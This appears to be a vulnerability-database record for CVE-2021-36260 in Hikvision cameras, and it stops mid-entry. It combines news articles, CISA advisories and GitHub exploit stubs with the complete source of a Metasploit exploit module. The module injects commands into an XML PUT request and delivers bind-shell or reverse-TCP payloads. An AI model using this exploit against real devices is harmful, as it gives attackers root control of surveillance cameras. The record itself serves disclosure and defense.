{"malwarebytes": [{"lastseen": "2021-09-22T15:04:28", "description": "In a detailed [post on Github](<https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html>), security researcher Watchful_IP describes how he found that the majority of the recent camera product ranges of Hikvision cameras are susceptible to a critical, unauthenticated, remote code execution (RCE) vulnerability, even with the latest firmware.\n\n### Hikvision\n\nHangzhou Hikvision Digital Technology Co., Ltd. engages in the development, production, and sale of security products. Its business activities include the provision of services for hard disk recorders, video codes, video servers, surveillance cameras, monitoring of ball machine, road mounts and other products, as well as security services. The company was founded on November 30, 2001 and is headquartered in Hangzhou, China.\n\nAccording to global market data provider IHS Markit, Hikvision has 38% of the global market share, and it has been the market leader since 2011. Hikvision is also known for its research on technologies such as visual recognition, cloud computing, and their adoption in security scenarios.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The vulnerability found by Watchfull_IP is listed under [CVE-2021-36260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260>) and could allow an unauthenticated attacker to gain full access to the device and possibly perform lateral movement into internal networks.\n\nThe critical bug has received 9.8 out of 10 on the [CVSS](<https://blog.malwarebytes.com/malwarebytes-news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities/>) scale of severity, clearly demonstrated by the fact it enables the attacker to gain even more access than the owner of the device has, since the owner will be restricted to a limited protected shell (psh) which filters input to a predefined set of limited, mostly informational commands.\n\nAccording to the researcher, the vulnerability has existed at least since 2016. All an attacker needs is access to the http(s) server port (typically 80/443). No username or password is needed, nor are any actions needed from the camera owner. The attack will not be detectable by any logging on the camera itself. A threat actor can exploit the vulnerability to launch a command injection attack by sending some messages with specially crafted commands.\n\n### Affected products\n\nUsers can find a list of affected products in the [security notification](<https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/>) from Hikvision. Among them are IP Cameras and PTZ Cameras. PTZ is short for Pan/Tilt/Zoom and the name is used for cameras that can be remotely controlled and pointed. These cameras can, and are often used in surveillance mode where they cover an area by moving between preset points and the footage is often recorded, so it can be reviewed at a later time.\n\nUsers of other brands should also be advised that there are a huge number of OEM resellers offering Hikvision cameras under their own model numbers.\n\n### Responsible disclosure\n\nThe researcher has not disclosed any specifics about the attack to protect potential victims. In his post he describes how he worked with Hikvision since the discovery made on Sunday June 20, 2021. He was extremely pleased that they took him seriously and involved him in taking care of the problem.\n\nOn August 17, Watchfull_IP received the patched IPC_G3 (V5.5.800 build 210628) and IPC H5 (V5.5.800 build 210628) firmware from HSRC for testing.\n\n> \u201cDecrypted and reversed the code in addition to live testing on my own equipment and confirmed to HSRC that the patched firmware resolves the vulnerability.\n> \n> Was further pleased to note this problem was fixed in the way I recommended.\u201d\n\nWe are glad that researchers like this check the security of the products we use and do responsible disclosure when they find problems, so manufacturers can resolve matters before some cybercriminal can start using our security equipment against us.\n\n### Mitigation\n\nA word of caution is needed here, since not all the software portals have been provided with the latest firmware that is patched against this attack. To be sure to get a patched version it is recommended by Hikvision to download the latest firmware for your device from the [global firmware portal](<https://www.hikvision.com/en/support/download/firmware/>). The researcher however notes that at the time of writing updated firmware seems to be properly deployed on the Hikvision China region firmware portal for Chinese region devices, but only partially on the global site. If you are in doubt there is a list of the [vulnerable firmware versions in the researchers post](<https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html#affected-firmware-types>).\n\nIn general it is a good idea not make your cameras accessible from the internet and if you do, put them behind a VPN.\n\nThe post [Patch now! Insecure Hikvision security cameras can be taken over remotely](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T12:19:40", "type": "malwarebytes", "title": "Patch now! Insecure Hikvision security cameras can be taken over remotely", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36260"], "modified": "2021-09-22T12:19:40", "id": "MALWAREBYTES:7DC590D7CCD7B42E23F1F1008D339A41", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/", "cvss": {"score": 0.0, "vector": "NONE"}}], "metasploit": [{"lastseen": "2022-06-24T08:36:49", "description": "This module exploits an unauthenticated command injection in a variety of Hikvision IP cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an HTTP PUT request sent to the `/SDK/webLanguage` endpoint, resulting in command execution as the `root` user. This module specifically attempts to exploit the blind variant of the attack. The module was successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. It was also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725. Please see the Hikvision advisory for a full list of affected products.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-19T21:13:24", "type": "metasploit", "title": "Hikvision IP Camera Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-02-25T16:32:06", "id": "MSF:EXPLOIT-LINUX-HTTP-HIKVISION_CVE_2021_36260_BLIND-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/hikvision_cve_2021_36260_blind/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Hikvision IP Camera Unauthenticated Command Injection',\n 'Description' => %q{\n This module exploits an unauthenticated command injection in a variety of Hikvision IP\n cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an\n HTTP PUT request sent to the `/SDK/webLanguage` endpoint, resulting in command execution\n as the `root` user.\n\n This module specifically attempts to exploit the blind variant of the attack. The module\n was successfully tested against an HWI-B120-D/W using firmware V5.5.101 build 200408. It\n was also tested against an unaffected DS-2CD2142FWD-I using firmware V5.5.0 build 170725.\n Please see the Hikvision advisory for a full list of affected products.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Watchful_IP', # Vulnerability discovery and disclosure\n 'bashis', # Proof of concept\n 'jbaines-r7' # Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-36260' ],\n [ 'URL', 'https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html'],\n [ 'URL', 'https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/security-notification-command-injection-vulnerability-in-some-hikvision-products/'],\n [ 'URL', 'https://github.com/mcw0/PoC/blob/master/CVE-2021-36260.py']\n ],\n 'DisclosureDate' => '2021-09-18',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_ARMLE],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n # the target has very limited payload targets and a tight payload space.\n # bind_busybox_telnetd might be *the only* one.\n 'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd',\n # saving four bytes of payload space by using 'sh' instead of '/bin/sh'\n 'LOGIN_CMD' => 'sh',\n 'Space' => 23\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_ARMLE],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'printf', 'echo' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 80,\n 'SSL' => false,\n 'MeterpreterTryToFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n # Check will test two things:\n # 1. Is the endpoint a Hikvision camera?\n # 2. Does the endpoint respond as expected to exploitation? This module is\n # specifically testing for the blind variant of this attack so we key off\n # of the returned HTTP status code. The developer's test target responded\n # to exploitation with a 500. Notes from bashis' exploit indicates that\n # they saw targets respond with 200 as well, so we'll accept that also.\n def check\n # Hikvision landing page redirects to '/doc/page/login.asp' via JavaScript:\n # <script>\n # window.location.href = \"/doc/page/login.asp?_\" + (new Date()).getTime();\n # </script>\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/')\n })\n return CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res\n return CheckCode::Safe('The target did not respond with a 200 OK') unless res.code == 200\n return CheckCode::Safe('The target doesn\\'t appear to be a Hikvision device') unless res.body.include?('/doc/page/login.asp?_')\n\n payload = '<xml><language>$(cat /proc/cpuinfo)</language></xml>'\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n })\n\n return CheckCode::Unknown(\"Didn't receive a response from the target.\") unless res\n return CheckCode::Safe('The target did not respond with a 200 OK or 500 error') unless (res.code == 200 || res.code == 500)\n\n # Some cameras are not vulnerable and still respond 500. We can weed them out by making\n # the remote target sleep and use a low timeout. This might not be good for high latency targets\n # or for people using Metasploit as a vulnerability scanner... but it's better than flagging all\n # 500 responses as vulnerable.\n payload = '<xml><language>$(sleep 20)</language></xml>'\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n }, 10)\n\n return CheckCode::Appears('It appears the target executed the provided sleep command.') unless res\n\n CheckCode::Safe('The target did not execute the provided sleep command.')\n end\n\n def execute_command(cmd, _opts = {})\n # The injection space is very small. The entire snprintf is 0x1f bytes and the\n # format string is:\n #\n # /dav/%s.tar.gz\n #\n # Which accounts for 12 bytes, leaving only 19 bytes for our payload. Fortunately,\n # snprintf will let us reclaim '.tar.gz' so in reality, there are 26 bytes for\n # our payload. We need 3 bytes to invoke our injection: $(). Leaving 23 bytes\n # for payload. The 'echo' stager has a minium of 26 bytes but we obviously don't\n # have that much space. We can steal the extra space from the \"random\" file name\n # and compress ' >> ' to '>>'. That will get us below 23. Squeezing the extra\n # bytes will also allow printf stager to do more than 1 byte per exploitation.\n cmd = cmd.gsub(%r{tmp/[0-9a-zA-Z]+}, @fname)\n cmd = cmd.gsub(/ >/, '>')\n cmd = cmd.gsub(/> /, '>')\n\n payload = \"<xml><language>$(#{cmd})</language></xml>\"\n res = send_request_cgi({\n 'method' => 'PUT',\n 'uri' => normalize_uri(target_uri.path, '/SDK/webLanguage'),\n 'data' => payload\n })\n\n fail_with(Failure::Disconnected, 'Connection failed') unless res\n fail_with(Failure::UnexpectedReply, \"HTTP status code is not 200 or 500: #{res.code}\") unless (res.code == 200 || res.code == 500)\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n # generate a random value for the tmp file name. See execute_command for details\n @fname = \"tmp/#{Rex::Text.rand_text_alpha(1)}\"\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n # 26 is technically a lie. See `execute_command` for additional insight\n execute_cmdstager(linemax: 26)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/hikvision_cve_2021_36260_blind.rb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-12-08T20:23:10", "description": "Although a patch was released in September, any still-vulnerable Hikvision IP Network Video Recorder (NVR) products are being actively targeted by the Mirai-based botnet [known](<https://threatpost.com/mootbot-fiber-routers-zero-days/154962/>) as Moobot.\n\nFortiGuard Labs has released a report detailing how the Moobot botnet is leveraging a known [remote code execution (RCE) vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36260>) in Hikvision products (CVE-2021-36260) to spread a Moobot, which carries out distributed denial of service (DDoS) attacks.\n\nThe attack surface could be significant: China-based Hikvision touted itself as the \u201cworld\u2019s leading [video-surveillance products supplier](<https://us.hikvision.com/en/about/hikvision-global>)\u201d on the company site.\n\nOnce the attacker finds a vulnerable system, a downloader drops the malware, which FortiGuard identified as Moobot, a variant of Mirai with traces of Satori code. Sartori is another [Mirai-based botnet](<https://threatpost.com/mirai-botnet-sees-big-2019-growth-shifts-focus-to-enterprises/146547/>) and one of dozens that have been spun off the original source code.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/08145818/moobot-attack-scenario.png>)\n\nAttack scenario. Source: FortiGuard Labs.\n\n\u201cIts most obvious feature is that it contains the data string \u201cw5q6he3dbrsgmclkiu4to18npavj702f\u201d, which is used in the \u201crand_alphastr\u201d function,\u201d the researchers found in analyzing the binary. \u201cIt is used to create random alphanumeric strings with different purposes, such as for a setup process name or to generate data for attacking.\u201d\n\nOnce it makes a connection with the command-and-control server (C2), it launches the DDoS attack, the report added, which looks like this:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/08145852/moobot-ddos-attack.png>)\n\nSource: FortiGuard Labs.\n\n## **Tracked to DDoS Service Provider**\n\nThe analysts were able to track the code to a DDoS service provider\u2019s Telegram channel called \u201ctianrian,\u201d which has been operating since August, they added.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/08145920/moobot-service-provider-telegram-chat.png>)\n\nSource: FortiGuard Labs.\n\n\u201cFrom the chatting channel we can see that the service is still updating,\u201d FortiGuard\u2019s report cautioned. \u201cUsers should always look out for DDoS attacks and apply patches to vulnerable devices.\u201d\n\nDuring Q3, threat researchers at Kaspersky found that the number of [DDoS attacks shattered records](<https://threatpost.com/ddos-attacks-records-q3/176082/>), often topping thousands per day.\n\nLinux-based Mirai was first identified in September of 2016 when it was used in a DDoS attack [against Krebs on Security](<https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/>). A month later it took out a vast swath of the internet with [a hit on Dyn](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>). And despite its source code [being released](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) in October 2016, it has since become one of the most [powerful internet of things botnets](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>), infecting products and gadgets from brands including D-Link, SonicWall and Netgear, and other connected devices.\n\nFortinet listed [Mirai as the top botnet threat](<https://threatpost.com/attackers-will-flock-to-crypto-wallets-linux-in-2022-podcast/176546/>) in its analysis of the first half of 2021. The report\u2019s author Derek Manky, Fortiguard Labs\u2019 chief of security insights and global threat alliances doesn\u2019t expect Mirai, or its related threat variants, to go away anytime soon.\n\n\u201cWe\u2019re going to fully expect to see more of [Mirai],\u201d Manky said. \u201cMore Linux-based botnets. A lot of these targets, we\u2019re not talking about Windows, but MacOS, we\u2019ve already seen more and more \u2026 code written for Linux itself, and that is a majority of the [internet of things, or IoT] space.\u201d\n\nAny organizations running unpatched Hikvision systems are urged to get the [firmware update](<https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/>) provided by the company.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[_**Register NOW**_](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)** for the LIVE event!**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-08T20:13:18", "type": "threatpost", "title": "Moobot Botnet Chews Up Hikvision Surveillance Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2021-12-08T20:13:18", "id": "THREATPOST:C04C55FD250D601E0548E64B78EDE16F", "href": "https://threatpost.com/moobot-botnet-hikvision-surveillance-systems/176879/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-11-26T18:14:34", "description": "Hikvision has released updates to mitigate a command injection vulnerability\u2014CVE-2021-36260\u2014in Hikvision cameras that use a web server service. A remote attacker could exploit this vulnerability to take control of an affected device. \n \nCISA encourages users and administrators to review Hikvision\u2019s Security Advisory [HSRC-202109-01](<https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/security-notification-command-injection-vulnerability-in-some-hikvision-products/>) and apply the latest firmware updates. See security researcher Watchful IP\u2019s [technical blogpost](<https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html>) for more information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "cisa", "title": "RCE Vulnerability in Hikvision Cameras (CVE-2021-36260) ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2021-09-29T00:00:00", "id": "CISA:28C7B30B096401B3117E4D6288853BD7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/28/rce-vulnerability-hikvision-cameras-cve-2021-36260", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-26T11:29:15", "description": "CISA has added 15 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | \n\n**Remediation \nDue Date** \n \n---|---|--- \nCVE-2021-22017 | VMware vCenter Server Improper Access Control Vulnerability | 1/24/2022 \nCVE-2021-36260 | Hikvision Improper Input Validation Vulnerability | 1/24/2022 \nCVE-2021-27860 | FatPipe WARP, IPVPN, and MPVPN Privilege Escalation vulnerability | 1/24/2022 \nCVE-2020-6572 | Google Chrome prior to 81.0.4044.92 Use-After-Free Vulnerability | 7/10/2022 \nCVE-2019-1458 | Microsoft Win32K Elevation of Privilege Vulnerability | 7/10/2022 \nCVE-2013-3900 | Microsoft WinVerify Trust Function Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2019-2725 | Oracle WebLogic Server, Injection Vulnerability | 7/10/2022 \nCVE-2019-9670 | Synacor Zimbra Collaboration Suite Improper Restriction of XML External Entity Reference Vulnerability | 7/10/2022 \nCVE-2018-13382 | Fortinet FortiOS and FortiProxy Improper Authorization Vulnerability | 7/10/2022 \nCVE-2018-13383 | Fortinet FortiOS and FortiProxy Improper Authorization Vulnerability | 7/10/2022 \nCVE-2019-1579 | Palo Alto Networks PAN-OS Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2019-10149 | Exim Mail Transfer Agent (MTA) Improper Input Validation Vulnerability | 7/10/2022 \nCVE-2015-7450 | IBM WebSphere Application Server and Server Hy Server Hypervisor Edition Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2017-1000486 | Primetek Primefaces Application Remote Code Execution Vulnerability | 7/10/2022 \nCVE-2019-7609 | Elastic Kibana Remote Code Execution Vulnerability | 7/10/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/10/cisa-adds-15-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-01-10T00:00:00", "type": "cisa", "title": "CISA Adds 15 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-3900", "CVE-2015-7450", "CVE-2017-1000486", "CVE-2018-13382", "CVE-2018-13383", "CVE-2019-10149", "CVE-2019-1458", "CVE-2019-1579", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-6572", "CVE-2021-22017", "CVE-2021-27860", "CVE-2021-36260"], "modified": "2022-01-25T00:00:00", "id": "CISA:99DAB57F9B8063F8619B1A418B014DF1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/10/cisa-adds-15-known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-05-15T21:10:27", "description": "# CVE-2021-36260-metasploit\nthe metasploit script(POC) about CVE...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T08:11:49", "type": "githubexploit", "title": "Exploit for Command Injection in Hikvision Ds-2Cd2026G2-Iu\\/Sl Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-05-15T18:14:09", "id": "A065A4CD-AEE7-5474-82F9-77720A53CF23", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-11T19:31:29", "description": "# CheckHKRCE\nCVE-2021-36260\n# Install \n- Python...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-13T09:23:36", "type": "githubexploit", "title": "Exploit for Command Injection in Hikvision Ds-2Cd2026G2-Iu\\/Sl Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36260"], "modified": "2022-02-02T18:44:17", "id": "BE5B3008-561B-5C3D-B8D1-BAA49FD49FA0", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-06T15:42:41", "description": "# CVE-2021-36260\nCVE-2021-36260 POC command injection vulnerabil...", "cvss3": {"exploitabilityScore": 3.9, 